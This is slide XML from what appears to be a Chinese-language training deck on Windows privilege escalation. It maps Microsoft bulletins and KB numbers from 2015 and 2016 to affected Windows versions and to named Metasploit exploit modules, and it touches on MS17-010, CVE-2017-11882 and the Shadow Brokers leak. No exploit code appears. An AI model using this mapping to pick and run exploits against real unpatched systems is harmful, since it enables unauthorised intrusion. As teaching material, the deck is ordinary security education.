              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2012 R2exploit/windows/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ntapphelpcachecontro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>KB3025421|MS15_ 004 Windows 7 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2008 R2 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 8-8.1 32-64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/ms15_ 004_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>tswbproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB3041836MS15-020 Windows Server 2003 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Vista 32-64 SP2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 R2 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows8-8.1 32-64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>/ms15_ 020_ shortcut_ icon_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>dlloader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290575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三、本地溢出漏洞及对应版本</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154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB3057191|MS15-051 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2003 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Vista 32-64 SP2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 R232-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows8-8.1 32-64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/ms15_ 051_ client_ copy. image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB3077657|MS15-077 Windows Server 2003 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Vista 32-64 SP2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 R2 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2008 R2 64-SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows8-8.1 32-64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>KB 3079904|MS15-078 Windows 2003 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Vista 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server2008 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 R2 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 8-8.1 32-64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/ms15_ 078_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>atmfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t> _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80743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三、本地溢出漏洞及对应版本</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154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年对应漏洞、编号及其影响系统和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB3134228|MS16-014 Windows Server 2008 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>KB3124280|MS16-016 WebDAV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提权漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Vista 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2008 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 8.1 32-64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WindowsServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 10 32-64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/ms16_ 016_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	KB3139914|MS16-032 Windows Vista 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server2008 32-64 SP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 32-64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2008 R2 64 SP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 8.1 32-64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Server 2012 R2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 10 32-64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>exploit/windows/local/ms16_ 032_ secondary_ logon_ handle_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>privesc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65470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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>提</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2667">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>权基础</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en-US" altLang="zh-CN" sz="2667" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MS17-010</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>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CVE-2017-11882</a:t>
            </a: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334152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en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>提权基础</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>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MS17-010</a:t>
            </a:r>
          </a:p>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CVE-2017-11882</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>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217578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一、背景故事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524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月有一个 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Shadow Brokers” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的黑客组织号称入侵了方程式组织窃取了大量机密文件，并将部分文件公开到了互联网上，方程式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Equation Group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）据称是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（美国国家安全局）下属的黑客组织，有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Shadow Brokers” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>还保留了部分文件，打算以公开拍卖的形式出售给出价最高的竞价者，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Shadow Brokers” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>预期的价格是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>万比特币（价值接近</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>亿美金）。这一切听起来难以置信，以至于当时有不少安全专家对此事件保持怀疑态度，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Shadow Brokers” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的拍卖也因此一直没有成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>北京时间 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
